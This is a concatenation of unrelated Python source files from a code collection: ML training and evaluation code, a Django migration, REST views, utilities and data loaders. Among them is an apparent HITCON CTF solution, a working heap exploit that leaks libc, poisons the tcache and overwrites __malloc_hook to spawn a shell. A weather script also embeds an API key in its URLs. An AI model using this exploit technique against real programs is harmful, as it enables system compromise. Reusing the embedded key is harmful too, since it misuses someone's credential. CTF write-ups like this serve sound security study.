prev_dev_acc += prev_acc.item() * prev_num_valid_turn
if n_gpu == 1:
if dev_loss_slot is None:
dev_loss_slot = [ l * num_valid_turn for l in loss_slot]
dev_acc_slot = acc_slot * num_valid_turn
prev_dev_loss_slot = [ l * prev_num_valid_turn for l in prev_loss_slot]
prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn
else:
for i, l in enumerate(loss_slot):
dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn
dev_acc_slot += acc_slot * num_valid_turn
for i, l in enumerate(prev_loss_slot):
prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn
prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn
nb_dev_examples += num_valid_turn
prev_nb_dev_examples += prev_num_valid_turn
dev_loss = dev_loss / nb_dev_examples
dev_acc = dev_acc / nb_dev_examples
prev_dev_loss = prev_dev_loss / prev_nb_dev_examples
prev_dev_acc = prev_dev_acc / prev_nb_dev_examples
if n_gpu == 1:
dev_acc_slot = dev_acc_slot / nb_dev_examples
prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples
if summary_writer is not None:
summary_writer.add_scalar("Validate/Loss", dev_loss, global_step)
summary_writer.add_scalar("Validate/Acc", dev_acc, global_step)
summary_writer.add_scalar("Validate/Prev_Loss", prev_dev_loss, global_step)
summary_writer.add_scalar("Validate/Prev_Acc", prev_dev_acc, global_step)
if n_gpu == 1:
for i, slot in enumerate(processor.target_slot):
summary_writer.add_scalar("Validate/Loss_%s" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step)
summary_writer.add_scalar("Validate/Acc_%s" % slot.replace(' ','_'), dev_acc_slot[i], global_step)
for i, slot in enumerate(processor.prev_slot):
summary_writer.add_scalar("Validate/Prev_Loss_%s" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step)
summary_writer.add_scalar("Validate/Prev_Acc_%s" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step)
logger.info("*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f ***" \
% (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc))
dev_loss = round(dev_loss, 6)
if last_update is None or dev_loss < best_loss:
# Save a trained model
output_model_file = os.path.join(args.output_dir, "pytorch_model.bin")
if args.do_train:
if n_gpu == 1:
torch.save(model.state_dict(), output_model_file)
else:
torch.save(model.module.state_dict(), output_model_file)
last_update = epoch
best_loss = dev_loss
best_acc = dev_acc
logger.info("*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***" % (last_update, best_loss, best_acc))
else:
logger.info("*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***" % (epoch, dev_loss, dev_acc))
#if epoch > 100 and last_update + args.patience <= epoch:
if last_update + args.patience <= epoch:
break
###############################################################################
# Evaluation
###############################################################################
# Test
output_model_file = os.path.join(args.output_dir, "pytorch_model.bin")
# Load a trained model that you have fine-tuned
ptr_model = torch.load(output_model_file, map_location=device)
del_list = []
for key in ptr_model.keys():
if ('slot' in key) or ('value' in key):
del_list.append(key)
for key in del_list:
del ptr_model[key]
if n_gpu > 1:
model = model.module
state = model.state_dict()
state.update(ptr_model)
model.load_state_dict(state)
model.to(device)
## Get slot-value embeddings
label_token_ids, label_len = [], []
for labels in label_list:
token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device)
label_token_ids.append(token_ids)
label_len.append(lens)
## Get slot-type embeddings
## Note: slot embeddings are ordered as [previous slots + present target slots]
slot_token_ids, slot_len = \
get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device)
model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len)
if n_gpu > 1:
model = torch.nn.DataParallel(model)
if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation)
all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features(
eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)
all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \
= all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)
logger.info("***** Running evaluation *****")
logger.info(" Num examples = %d", len(eval_examples))
logger.info(" Batch size = %d", args.eval_batch_size)
eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)
# Run prediction for full data
eval_sampler = SequentialSampler(eval_data)
eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size)
model.eval()
eval_loss, eval_accuracy = 0, 0
eval_loss_slot, eval_acc_slot = None, None
nb_eval_steps, nb_eval_examples = 0, 0
prev_eval_loss, prev_eval_accuracy = 0, 0
prev_eval_loss_slot, prev_eval_acc_slot = None, None
nb_eval_examples_prev = 0
for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc="Evaluating"):
if input_ids.dim() == 2:
input_ids = input_ids.unsqueeze(0)
input_len = input_len.unsqueeze(0)
                label_ids = label_ids.unsqueeze(0)
                prev_label_ids = prev_label_ids.unsqueeze(0)
with torch.no_grad():
if n_gpu == 1:
loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)
prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
else:
loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)
loss = loss.mean()
acc = acc.mean()
acc_slot = acc_slot.mean(0)
prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
prev_loss = prev_loss.mean()
prev_acc = prev_acc.mean()
prev_acc_slot = prev_acc_slot.mean(0)
nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item()
nb_eval_examples_prev += nb_eval_ex_prev
nb_eval_ex = (label_ids[:,:,0].view(-1) != -1).sum().item()
nb_eval_examples += nb_eval_ex
nb_eval_steps += 1
def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex):
eval_loss += loss.item() * nb_eval_ex
eval_accuracy += acc.item() * nb_eval_ex
if loss_slot is not None:
if eval_loss_slot is None:
eval_loss_slot = [ l * nb_eval_ex for l in loss_slot]
else:
for i, l in enumerate(loss_slot):
eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex
if eval_acc_slot is None:
eval_acc_slot = acc_slot * nb_eval_ex
else:
eval_acc_slot += acc_slot * nb_eval_ex
return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot
eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \
_post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex)
prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \
_post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \
prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev)
eval_loss /= nb_eval_examples
if eval_loss_slot is None: # for multi-gpu
eval_loss_slot = [0]
prev_eval_loss_slot = [0]
eval_accuracy = eval_accuracy / nb_eval_examples
prev_eval_loss = prev_eval_loss / nb_eval_examples_prev
prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev
eval_acc_slot = eval_acc_slot / nb_eval_examples
prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev
total_acc_slot = {}
for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)):
total_acc_slot[idx] = val
total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0))
loss = tr_loss / nb_tr_steps if args.do_train else None
result = {'eval_loss': eval_loss,
'eval_accuracy': eval_accuracy,
'loss': loss,
'eval_loss_slot':'\t'.join([ str(val/ nb_eval_examples) for val in eval_loss_slot]),
'eval_acc_slot':'\t'.join([ str((val).item()) for val in eval_acc_slot]),
'prev_eval_loss': prev_eval_loss,
'prev_eval_accuracy': prev_eval_accuracy,
'prev_eval_loss_slot': '\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]),
'prev_eval_acc_slot': '\t'.join([str((val).item()) for val in prev_eval_acc_slot]),
'total_acc_slot': '\t'.join([str(val[1].item()) for val in total_acc_slot])
}
out_file_name = 'eval_results'
if args.target_slot=='all':
out_file_name += '_all'
output_eval_file = os.path.join(args.output_dir, "%s.txt" % out_file_name)
with open(output_eval_file, "w") as writer:
logger.info("***** Eval results *****")
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
###############################################################################
# Analyze: TODO
###############################################################################
if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
pdb.set_trace()
def draw(data, x, y, ax):
seaborn.heatmap(data,
xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0,
cbar=False, ax=ax)
class_correct = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))]
class_count = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))]
eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation)
all_input_ids, all_input_len, all_label_ids = convert_examples_to_features(
eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length)
all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to(
device), all_label_ids.to(device)
logger.info("***** Running analysis *****")
logger.info(" Num examples = %d", len(eval_examples))
logger.info(" Batch size = %d", 1)
eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids)
# Run prediction for full data
eval_sampler = SequentialSampler(eval_data)
eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1)
model.eval()
none_value_id = [ len(val)-1 for val in label_list]
incorrect_dialogs = []
attention_draw = 5
for input_ids, input_len, label_ids in tqdm(eval_dataloader, desc="Evaluating"):
if input_ids.dim() == 2:
input_ids = input_ids.unsqueeze(0)
input_len = input_len.unsqueeze(0)
                label_ids = label_ids.unsqueeze(0)
with torch.no_grad():
_, _, acc, _, pred_slot = model(input_ids, input_len, label_ids, 1)
nturn = (label_ids[:,:,0].view(-1) != -1).sum().item()
nslot = label_ids.size(2)
for slot in range(nslot):
for turn in range(nturn):
class_count[slot][label_ids[0][turn][slot]]+=1
if label_ids[0][turn][slot] == pred_slot[0][turn][slot]:
class_correct[slot][label_ids[0][turn][slot]] +=1
drawfig = False
print('hotel')
print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1))
print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1))
print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1))
print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1))
pdb.set_trace()
if drawfig == True:
#if (len(incorrect_dialogs) < attention_draw):
max_len = input_ids.size(2)
attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len)
for slot in range(0, nslot):
fig, axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn))
print("Slot", slot)
for turn in range(nturn):
draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(),
tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()),
[*range(0, args.attn_head)], ax=axs[turn])
axs[turn].set_title("turn %d slot: %s label: %s pred: %s"
% (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]),
str(label_list[slot][pred_slot[0][turn][slot].item()]) ))
plt.show()
plt.savefig(os.path.join(args.output_dir, "attention-d%d-slot%s.png"%(len(incorrect_dialogs), slot)))
plt.close()
if not acc == 1:
dialog = []
for input, label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]):
if label[0] == -1:
break
text = {}
text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '')
text['label'] = [str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())]
text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())]
dialog.append(text)
incorrect_dialogs.append(dialog)
output_eval_incorr_file = os.path.join(args.output_dir, "incorrect_dialog.txt")
with open(output_eval_incorr_file, "w") as writer:
for dialog in incorrect_dialogs:
for turn in dialog:
text = turn['input'] + '\t'
for label, pred in zip(turn['label'], turn['pred']):
text += '%s\t%s\t'%(label, pred)
writer.write("%s\n" % text)
writer.write("---------- \n")
logger.info("Done analysis: %s" % output_eval_incorr_file)
output_eval_incorr_file = os.path.join(args.output_dir, "per_class_accuracy.txt")
with open(output_eval_incorr_file, "w") as writer:
total_class_acc = 0
total_slot_class_acc = []
nlabels = 0
for sid, slot in enumerate(class_count):
slot_class_acc = 0
for vid, value in enumerate(slot):
if not value == 0:
class_acc = class_correct[sid][vid]/value
writer.write("%s\t%d\t%d\t%.3f\n"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) )
slot_class_acc += class_acc
nlabels += 1
else:
writer.write("%s\t%d\t%d\t%.3f\n"%(label_list[sid][vid], class_correct[sid][vid], value, -1) )
total_slot_class_acc.append(slot_class_acc/(vid+1))
total_class_acc+=slot_class_acc
total_class_acc /= nlabels
for sid, slot_acc in enumerate(total_slot_class_acc):
writer.write("%d\t%.3f\n" % (sid, slot_acc))
writer.write("total class accuracy \t%.3f\n" % total_class_acc)
logger.info("Done analysis: %s" % output_eval_incorr_file)
print(class_correct)
print(class_count)
if __name__ == "__main__":
main() | 2.28125 | 2 |
s3-encfs-fuse.py | hirokikana/s3-encfs-fuse | 0 | 12796179 | <gh_stars>0
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from s3encfs.s3fs import S3FS
from sys import argv, exit
import logging
from fuse import FUSE
if __name__ == '__main__':
if len(argv) != 2:
print('usage: %s <mountpoint>' % argv[0])
exit(1)
logging.basicConfig(level=logging.DEBUG)
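    # foreground=True keeps the FUSE loop in this process (the call blocks until
    # the filesystem is unmounted), so the DEBUG logging above reaches the console.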
fuse = FUSE(S3FS(), argv[1], foreground=True)
| 1.914063 | 2 |
ipcrg/resources/id_mapping/download_human_gene_mapping.py | iPC-project-H2020/ipcrg | 3 | 12796180 | <filename>ipcrg/resources/id_mapping/download_human_gene_mapping.py<gh_stars>1-10
"""Download the latest NCBI id mapping for humans."""
import os
import argparse
import urllib.request
import pandas as pd
MAPPING_FTP_FILEPATH = (
'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/'
'gene2accession.gz'
)
TAX_ID = 9606
parser = argparse.ArgumentParser()
parser.add_argument(
'-o',
'--filepath',
type=str,
help='path where to store the file.',
required=True
)
if __name__ == '__main__':
# parse arguments
args = parser.parse_args()
# download the file
urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath)
# extract specific taxonomy data
mapping_df = pd.concat(
[
batch[batch.index == TAX_ID] for batch in
pd.read_csv(args.filepath, sep='\t', index_col=0, chunksize=10000)
],
sort=False
)
# delete the full file
os.remove(args.filepath)
# dump the mapping file
mapping_df.to_csv(args.filepath, sep='\t')
| 2.953125 | 3 |
openslides_backend/action/action_interface.py | reiterl/openslides-backend | 0 | 12796181 | from typing import Any, Dict, List
from mypy_extensions import TypedDict
from typing_extensions import Protocol
ActionPayload = List[Dict[str, Any]]
ActionPayloadWithLabel = TypedDict(
"ActionPayloadWithLabel", {"action": str, "data": ActionPayload}
)
Payload = List[ActionPayloadWithLabel]
ActionResult = TypedDict("ActionResult", {"success": bool, "message": str})
class Action(Protocol): # pragma: no cover
"""
Interface for action component.
The handle_request method raises ActionException or PermissionDenied if
the request fails.
"""
def handle_request(self, payload: Payload, user_id: int) -> List[ActionResult]:
...
| 2.6875 | 3 |
openmct_python_example/python-server/test.py | waltoncade/KSD_GroundSystems | 2 | 12796182 | <reponame>waltoncade/KSD_GroundSystems<gh_stars>1-10
import queue, threading, time
hist = queue.Queue()
real = queue.Queue()
def putData():
histStart = 0
realStart = 0
while True:
time.sleep(1)
hist.put(histStart)
real.put(realStart)
histStart = histStart - 1
realStart = realStart + 1
def getHist():
while True:
while not hist.empty():
print(hist.get())
def getReal():
while True:
while not real.empty():
print(real.get())
if __name__ == "__main__":
threading.Thread(target=putData).start()
threading.Thread(target=getHist).start()
threading.Thread(target=getReal).start()
while True:
pass | 2.6875 | 3 |
aerolyzer/wunderData.py | Aerolyzer/Aerolyzer | 9 | 12796183 | <gh_stars>1-10
import urllib2
import json
import sys
import os
#def get_wunderkey()
def get_data(coord):
'''
Purpose: The purpose of this script is to retrieve meteorological data
    of a given comma-separated latitude and longitude coordinates via the
wunderground API.
Inputs: coord: string representing comma-separated coordinates.
    Outputs: weatherData: dictionary of city, country, temp in F, sunrise time, sunset time.
Returns: dictionary with 5 keys.
Assumptions: The wunderground API key is valid.
'''
name = coord + '.json'
try:
f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name)
m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name)
conditions = f.read()
parsedConditions = json.loads(conditions)
astronomy = m.read()
parsedAstronomy = json.loads(astronomy)
city = parsedConditions['location']['city']
country = parsedConditions['location']['country']
temp = parsedConditions['current_observation']['temp_f']
sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute']
sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour']
sunrise = sunriseHr + ":" + sunriseMin
sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute']
sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour']
sunset = sunsetHr + ":" + sunsetMin
weatherData = {'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset}
except Exception:
print ("Unable to retrieve data: ", sys.exc_info()[0])
weatherData = None
finally:
return weatherData
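# Example usage sketch (illustrative only; assumes the API key above is still
# valid, network access is available, and uses hypothetical coordinates):
if __name__ == '__main__':
    sample = get_data('37.7749,-122.4194')
    if sample is not None:
        print ("%s, %s: %s F (sunrise %s, sunset %s)" %
               (sample['city'], sample['country'], sample['temp'],
                sample['sunrise'], sample['sunset']))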
| 3.625 | 4 |
reader.py | pianomania/cifar10 | 2 | 12796184 | import numpy as np
import os
import re
import cPickle
class read_cifar10(object):
def __init__(self, data_path=None, is_training=True):
self.data_path = data_path
self.is_training = is_training
def load_data(self):
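        # Returns (data, labels): data is a stacked (N, 3072) array of flattened
        # 32x32x3 CIFAR-10 images (data_batch_1..5 when is_training, test_batch
        # otherwise), labels is the matching length-N label vector.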
files = os.listdir(self.data_path)
if self.is_training is True:
pattern = re.compile('(data_batch_).')
to_read = [m.group(0) for i in files for m in [pattern.search(i)] if m]
data = []
labels = []
for t in to_read:
with open(self.data_path+'/'+t, 'rb') as f:
d = cPickle.load(f)
data.append(d['data'])
labels.append(d['labels'])
data = np.vstack(data)
labels = np.hstack(labels)
else:
with open(self.data_path+'/test_batch') as f:
d = cPickle.load(f)
data = d['data']
labels = d['labels']
return data, labels
| 2.390625 | 2 |
things_cli/__init__.py | thingsapi/things-cli | 49 | 12796185 | <gh_stars>10-100
"""A simple Python 3 CLI to read your Things app data."""
__author__ = "<NAME>"
__copyright__ = "2021 <NAME>"
__credits__ = ["<NAME>"]
__license__ = "Apache License 2.0"
__version__ = "0.1.2"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
| 1.375 | 1 |
packages/core/minos-microservice-networks/minos/networks/brokers/handlers/__init__.py | bhardwajRahul/minos-python | 247 | 12796186 | from .impl import (
BrokerHandler,
)
from .ports import (
BrokerHandlerService,
BrokerPort,
)
| 1.148438 | 1 |
combinatorics.py | GoaPhuDen/algorithms-in-python | 100 | 12796187 | """ Various combinatorics functions. """
__author__ = "<NAME>"
__date__ = "2015-02-20"
def factorial(n):
if n == 0:
return 1
else:
return n * factorial(n-1)
def permutations(lst):
result = []
def permute(current, rest):
if rest == []:
result.append(current)
return
for r in rest:
permute(current + (r,), [i for i in rest if i != r])
permute((), lst)
return result
def subsets(lst):
result = []
def _subsets(current, rest):
if rest == []:
result.append(current)
return
(first, *rest) = rest
_subsets(current + (first,), rest)
_subsets(current, rest)
_subsets((), lst)
return result
if __name__ == "__main__":
print("Permutations of ['a','b','c']:", permutations(['a','b','c']))
print("Subsets of ['a','b','c']:", subsets(['a','b','c']))
| 4.03125 | 4 |
sqliscan/lib/reporter.py | Marzooq13579/Hack-Gadgets | 8 | 12796188 | <reponame>Marzooq13579/Hack-Gadgets
from lib.colour import colours
class Report:
def __init__(self, msg, result=False):
"""
Handles the message and report it back to console
:param msg : String type message
:param result : the boolean object indicating if the url is vulnerable
"""
if result:
print("{}{}{}".format(colours.FAIL, msg, colours.ENDC))
else:
print(msg)
| 3.03125 | 3 |
assessment/migrations/0008_auto_20190125_1249.py | kenware/Assessment | 0 | 12796189 | # Generated by Django 2.1.4 on 2019-01-25 12:49
import datetime
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('assessment', '0007_answer_is_correct_choice'),
]
operations = [
migrations.RemoveField(
model_name='question',
name='correct_choices',
),
migrations.AddField(
model_name='assessment',
name='multi_times',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='score',
name='history',
field=django.contrib.postgres.fields.jsonb.JSONField(default={}),
),
migrations.AlterField(
model_name='answer',
name='created_at',
field=models.DateField(default=datetime.date(2019, 1, 25)),
),
migrations.AlterField(
model_name='assessment',
name='created_at',
field=models.DateField(default=datetime.date(2019, 1, 25)),
),
migrations.AlterField(
model_name='question',
name='created_at',
field=models.DateField(default=datetime.date(2019, 1, 25)),
),
migrations.AlterField(
model_name='question',
name='mark',
field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19),
),
migrations.AlterField(
model_name='score',
name='assessment_score',
field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19),
),
migrations.AlterField(
model_name='score',
name='created_at',
field=models.DateField(default=datetime.date(2019, 1, 25)),
),
migrations.AlterField(
model_name='score',
name='status',
field=models.CharField(blank=True, default='started', max_length=250),
),
]
| 1.828125 | 2 |
scripts/plot_compartment_strength.py | Lila14/multimds | 0 | 12796190 | <filename>scripts/plot_compartment_strength.py
from matplotlib import pyplot as plt
import sys
sys.path.append("..")
import compartment_analysis as ca
import data_tools as dt
import os
paths = sys.argv[1:len(sys.argv)]
prefixes = [os.path.basename(path) for path in paths]
structs = [dt.structureFromBed(path) for path in paths]
mats = [dt.matFromBed(path, struct) for path, struct in zip(paths, structs)]
all_comps = [ca.get_compartments(mat) for mat in mats]
all_gen_coords = [struct.getGenCoords() for struct in structs]
#all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1]
for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes):
plt.plot(gen_coords, comps, label=prefix)
plt.legend()
plt.show()
| 2.390625 | 2 |
tests/__init__.py | crashfrog/peewee-pymssql | 0 | 12796191 | """Unit test package for peewee_pymssql."""
| 1.132813 | 1 |
server/social_network/views.py | ctcusc/django-react-boilerplate | 5 | 12796192 | """API views for social_network."""
from rest_framework import viewsets
from rest_framework.decorators import api_view, detail_route
from rest_framework.response import Response
from rest_framework.reverse import reverse
from .models import Profile, Post, Vote
from .serializers import ProfileSerializer, PostSerializer
@api_view(['GET'])
def api_root(request, format=None):
"""Root of API, this is useful for documentation generated by DRF."""
return Response({
'profiles': reverse('profile-list', request=request, format=format),
'posts': reverse('post-list', request=request, format=format)
})
class ProfileViewSet(viewsets.ReadOnlyModelViewSet):
"""This provides get and list functionality for Profiles."""
queryset = Profile.objects.all()
serializer_class = ProfileSerializer
class PostViewSet(viewsets.ModelViewSet):
"""Get or create Posts.
retrieve:
Return a post given its ID.
list:
Get a paginated list of all Posts.
create:
Create a new Post as the logged-in user.
"""
queryset = Post.objects.all().order_by('-created')
serializer_class = PostSerializer
def perform_create(self, serializer):
"""Create a Post associated with the logged-in user."""
serializer.save(owner=self.request.user.profile)
@detail_route(methods=['POST', 'DELETE'], url_path='vote')
def vote(self, request, pk=None):
"""Vote or unvote on a post."""
post = self.get_object()
if request.method == 'POST':
# check if the vote already exists, if so don't allow the user to vote again
if Vote.objects.filter(profile=self.request.user.profile, post=post).exists():
# the user already voted, just return the post directly
data = PostSerializer(post, context={'request': self.request}).data
return Response(data)
new_vote = Vote(profile=self.request.user.profile, post=post)
new_vote.save()
elif request.method == 'DELETE':
Vote.objects.filter(profile=self.request.user.profile, post=post).delete()
data = PostSerializer(post, context={'request': self.request}).data
return Response(data)
| 2.734375 | 3 |
HITCON/2018/children_tcache/exploit.py | Per5ianCat/ctf-writeups | 476 | 12796193 | #!/usr/bin/env python
from pwn import *
def new_heap(size, data, attack=False):
p.sendlineafter('Your choice: ', '1')
p.sendlineafter('Size:', str(size))
if attack:
return
p.sendafter('Data:', data)
if len(data) < size:
p.sendline()
def show_heap(index):
p.sendlineafter('Your choice: ', '2')
p.sendlineafter('Index:', str(index))
def delete_heap(index):
p.sendlineafter('Your choice: ', '3')
p.sendlineafter('Index:', str(index))
with context.quiet:
# hitcon{l4st_rem41nd3r_1s_v3ry_us3ful}
# p = remote('192.168.127.12', 8763)
p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'})
# table[0] => chunk_0 (0x511)
new_heap(0x500, 'a' * 0x4ff)
# table[1] => chunk_1 (0x71)
new_heap(0x68, 'b' * 0x67)
# table[2] => chunk_2 (0x601)
new_heap(0x5f0, 'c' * 0x5ef)
# table[3] => chunk_3 (0x31)
# this chunk is for preventing consolidation of previous
# chunks with the top chunk
new_heap(0x20, 'd' * 0x20)
# we need to delete chunk_1, so we can re-allocate it again
# in order to launch off-by-one (poison-null-byte) attack
delete_heap(1)
# chunk_0 should be freed so it can be consolidated with chunk_2 later
delete_heap(0)
# when we free a chunk, the program writes 0xDA over the whole chunk,
# so we need to zero out some parts of chunk_1. Therefore,
# we allocate/free chunk_1 multiple times with different sizes;
# interestingly, it always has a chunk size of 0x71, but the program only cares
# about the input size
for i in range(9):
# table[0] => chunk_1 (0x71)
    # this causes strcpy to write a null byte at the end of the buffer.
    # when i == 0, the off-by-one happens and turns the size of chunk_2 from
    # 0x601 to 0x600. Therefore, we clear the PREV_IN_USE bit.
new_heap(0x68 - i, 'b' * (0x68 - i))
# we need to free the chunk, so malloc returns it on the next new_heap call
delete_heap(0)
# table[0] => chunk_1 (0x71)
# this sets the prev_size field of chunk_2
new_heap(0x68, 'b' * 0x60 + p64(0x580))
# when we free chunk_2, it consolidates with chunk_0
# therefore, we have an overlapping free chunk with chunk_1
# the resulting big chunk will be put in the unsorted bin
delete_heap(2)
# table[1] => chunk_4 (0x511)
# this will use the unsorted bin for allocation, and writes
# a libc address into chunk_1 fd/bk fields
new_heap(0x508, 'e' * 0x507)
# viewing chunk_1 will leak a libc address
show_heap(0)
libc_addr = p.recvuntil('\n$$')[:-3]
libc_base = u64(libc_addr + '\x00' * (8 - len(libc_addr))) - 0x3ebca0
print 'libc base: {}'.format(hex(libc_base))
# table[2] => chunk_5 (0x71)
# this will allocate chunk_5 exactly in the same place as chunk_1
new_heap(0x68, 'f' * 0x67)
# we use a tcache_dup attack here, enabled by a double free:
# freeing chunk_1 and chunk_5 puts them both in the same tcache bin
# even though they point to the same address
delete_heap(0)
delete_heap(2)
# we can create a fake chunk before __malloc_hook with size of 0x7f
malloc_hook = libc_base + 0x3ebc30
fake_chunk = malloc_hook - 0x13
print 'fake chunk: {}'.format(hex(fake_chunk))
# table[4] => chunk_5 (0x71)
# we used tcache_poisoning here
# chunk_5 will be served from tcache and we will put the address of
# our fake chunk in the chunk_1's fd.
new_heap(0x68, p64(fake_chunk))
# table[5] => chunk_1 (0x71)
# this allocation serves chunk_1 and puts the fake chunk address in the tcache
new_heap(0x68, 'h' * 0x67)
'''
0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
'''
# table[6] => fake_chunk (0x7f)
# since fake_chunk is at the head of the list, this allocation returns it
# then, we overwrite __malloc_hook with one gadget
new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322))
# this allocation triggers __malloc_hook and we have shell
new_heap(1, '', True)
p.interactive()
| 2.546875 | 3 |
CKButils.py | MathAI-LAB/CKB | 5 | 12796194 | <filename>CKButils.py
# -*- coding: utf-8 -*-
import torch
from torch.autograd import Variable
import sys
##################################
# Network & Variable
##################################
def weights_init(m):
"""Initialize network parameters."""
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.05)
elif classname.find('BatchNorm') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
elif classname.find('Linear') != -1:
m.weight.data.normal_(0.0, 0.05)
m.bias.data.fill_(0)
def weights_init_kaiming(m):
classname = m.__class__.__name__
if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1:
torch.nn.init.kaiming_uniform_(m.weight)
torch.nn.init.zeros_(m.bias)
elif classname.find('BatchNorm') != -1:
torch.nn.init.normal_(m.weight, 1.0, 0.02)
torch.nn.init.zeros_(m.bias)
elif classname.find('Linear') != -1:
torch.nn.init.xavier_normal_(m.weight)
torch.nn.init.zeros_(m.bias)
def to_var(x):
"""Convert numpy to variable."""
if torch.cuda.is_available():
x = x.cuda()
return Variable(x)
def to_data(x):
"""Convert variable to numpy."""
